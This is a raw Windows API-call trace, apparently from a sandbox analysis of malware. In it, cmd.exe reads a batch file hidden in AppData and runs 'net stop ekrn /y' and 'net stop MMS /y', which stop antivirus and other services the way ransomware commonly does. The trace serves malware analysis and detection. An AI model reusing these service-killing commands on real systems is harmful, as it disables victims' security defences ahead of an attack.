| out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.408] GetProcessHeap () returned 0x3e0000 [0217.408] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0217.408] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0217.408] GetProcessHeap () returned 0x3e0000 [0217.409] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0217.409] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.409] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.409] GetLastError () returned 0x2 [0217.410] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.410] GetLastError () returned 0x2 [0217.410] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.411] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0217.411] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.411] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.411] GetLastError () returned 0x2 [0217.412] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0217.412] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.412] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.413] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0217.413] SetErrorMode (uMode=0x0) returned 0x1 [0217.413] GetProcessHeap () returned 0x3e0000 [0217.413] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0217.413] GetProcessHeap () returned 0x3e0000 [0217.413] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0217.413] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.413] GetProcessHeap () returned 0x3e0000 [0217.413] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0217.413] GetProcessHeap () returned 0x3e0000 [0217.413] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0217.414] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0217.414] GetProcessHeap () returned 0x3e0000 [0217.414] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0217.414] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.414] GetProcessHeap () returned 0x3e0000 [0217.414] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0217.414] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0217.414] GetProcessHeap () returned 0x3e0000 [0217.414] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0217.415] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.415] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.415] GetLastError () returned 0x2 [0217.416] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.416] GetLastError () returned 0x2 [0217.416] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.416] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0217.417] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.417] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.417] GetLastError () returned 0x2 [0217.417] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0217.418] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.418] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.418] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0217.418] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0217.418] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0217.419] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0217.419] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ekrn /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ekrn /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ekrn /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xb9c, dwThreadId=0xb8c)) returned 1 [0217.423] CloseHandle (hObject=0x78) returned 1 [0217.423] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0217.423] GetProcessHeap () returned 0x3e0000 [0217.423] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.423] GetEnvironmentStringsW () returned 0x3f8408* [0217.423] GetProcessHeap () returned 0x3e0000 [0217.423] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.423] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.423] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0217.549] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0217.549] CloseHandle (hObject=0x74) returned 1 [0217.549] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0217.549] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0217.549] GetProcessHeap () returned 0x3e0000 [0217.549] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.549] GetEnvironmentStringsW () returned 0x3f8408* [0217.549] GetProcessHeap () returned 0x3e0000 [0217.549] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.549] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.549] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0217.550] GetProcessHeap () returned 0x3e0000 [0217.550] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.550] GetEnvironmentStringsW () returned 0x3f8408* [0217.550] GetProcessHeap () returned 0x3e0000 [0217.550] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.550] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.550] GetProcessHeap () returned 0x3e0000 [0217.550] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0217.550] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0217.550] _get_osfhandle (_FileHandle=1) returned 0x264 [0217.550] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0217.550] _get_osfhandle (_FileHandle=1) returned 0x264 [0217.550] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0217.550] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0217.550] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0217.551] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0217.551] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0217.551] SetConsoleInputExeNameW () returned 0x1 [0217.551] GetConsoleOutputCP () returned 0x1b5 [0217.551] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0217.551] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0217.551] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0217.551] _get_osfhandle (_FileHandle=3) returned 0x74 [0217.551] SetFilePointer (in: hFile=0x74, lDistanceToMove=5964, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x174c [0217.551] GetProcessHeap () returned 0x3e0000 [0217.551] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0217.552] GetProcessHeap () returned 0x3e0000 [0217.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0217.552] GetProcessHeap () returned 0x3e0000 [0217.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0217.552] GetProcessHeap () returned 0x3e0000 [0217.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0217.552] GetProcessHeap () returned 0x3e0000 [0217.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0217.552] GetProcessHeap () returned 0x3e0000 [0217.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0217.552] GetProcessHeap () returned 0x3e0000 [0217.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0217.552] GetProcessHeap () returned 0x3e0000 [0217.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0217.552] GetProcessHeap () returned 0x3e0000 [0217.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0217.552] GetProcessHeap () returned 0x3e0000 [0217.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0217.552] GetProcessHeap () returned 0x3e0000 [0217.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0217.552] GetProcessHeap () returned 0x3e0000 [0217.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0217.552] GetProcessHeap () returned 0x3e0000 [0217.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0217.552] _get_osfhandle (_FileHandle=3) returned 0x74 [0217.552] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x174c [0217.552] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x175, lpOverlapped=0x0) returned 1 [0217.552] SetFilePointer (in: hFile=0x74, lDistanceToMove=5981, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x175d [0217.552] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=17, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MMS /y\r\n\n /y\r\ny\r\nC /y\r\ntor /y\r\n /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 17 [0217.553] _get_osfhandle (_FileHandle=3) returned 0x74 [0217.553] GetFileType (hFile=0x74) returned 0x1 [0217.553] _get_osfhandle (_FileHandle=3) returned 0x74 [0217.553] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x175d [0217.553] GetProcessHeap () returned 0x3e0000 [0217.553] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0217.553] GetProcessHeap () returned 0x3e0000 [0217.553] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0217.556] _tell (_FileHandle=3) returned 5981 [0217.556] _close (_FileHandle=3) returned 0 [0217.556] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0217.556] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0217.557] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0217.557] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0217.557] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0217.557] _wcsicmp (_String1="net", _String2="CD") returned 11 [0217.557] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0217.557] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0217.557] _wcsicmp (_String1="net", _String2="REN") returned -4 [0217.557] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0217.557] _wcsicmp (_String1="net", _String2="SET") returned -5 [0217.557] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0217.557] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0217.557] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0217.557] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0217.557] _wcsicmp (_String1="net", _String2="MD") returned 1 [0217.557] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0217.557] _wcsicmp (_String1="net", _String2="RD") returned -4 [0217.557] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0217.557] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0217.557] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0217.557] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0217.557] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0217.557] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0217.557] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0217.557] _wcsicmp (_String1="net", _String2="VER") returned -8 [0217.557] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0217.557] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0217.557] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0217.557] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0217.557] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0217.557] _wcsicmp (_String1="net", _String2="START") returned -5 [0217.557] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0217.557] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0217.557] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0217.557] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0217.557] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0217.557] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0217.557] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0217.557] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0217.558] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0217.558] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0217.558] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0217.558] SetErrorMode (uMode=0x0) returned 0x1 [0217.558] GetProcessHeap () returned 0x3e0000 [0217.558] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0217.558] GetProcessHeap () returned 0x3e0000 [0217.558] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0217.558] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.558] GetProcessHeap () returned 0x3e0000 [0217.559] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0217.559] GetProcessHeap () returned 0x3e0000 [0217.559] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0217.559] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0217.559] GetProcessHeap () returned 0x3e0000 [0217.559] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0217.559] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.559] GetProcessHeap () returned 0x3e0000 [0217.559] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0217.559] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0217.559] GetProcessHeap () returned 0x3e0000 [0217.559] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0217.560] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.560] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.560] GetLastError () returned 0x2 [0217.561] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.561] GetLastError () returned 0x2 [0217.561] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.562] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0217.562] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.562] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.562] GetLastError () returned 0x2 [0217.563] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0217.563] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.563] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.564] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0217.564] SetErrorMode (uMode=0x0) returned 0x1 [0217.564] GetProcessHeap () returned 0x3e0000 [0217.564] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0217.564] GetProcessHeap () returned 0x3e0000 [0217.564] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0217.564] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.564] GetProcessHeap () returned 0x3e0000 [0217.564] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0217.564] GetProcessHeap () returned 0x3e0000 [0217.564] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0217.565] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0217.565] GetProcessHeap () returned 0x3e0000 [0217.565] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0217.565] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.565] GetProcessHeap () returned 0x3e0000 [0217.565] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0217.565] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0217.565] GetProcessHeap () returned 0x3e0000 [0217.565] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0217.566] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.566] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.566] GetLastError () returned 0x2 [0217.567] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.567] GetLastError () returned 0x2 [0217.567] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.567] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0217.568] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.568] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.568] GetLastError () returned 0x2 [0217.568] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0217.569] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.569] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.569] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0217.569] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0217.569] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) 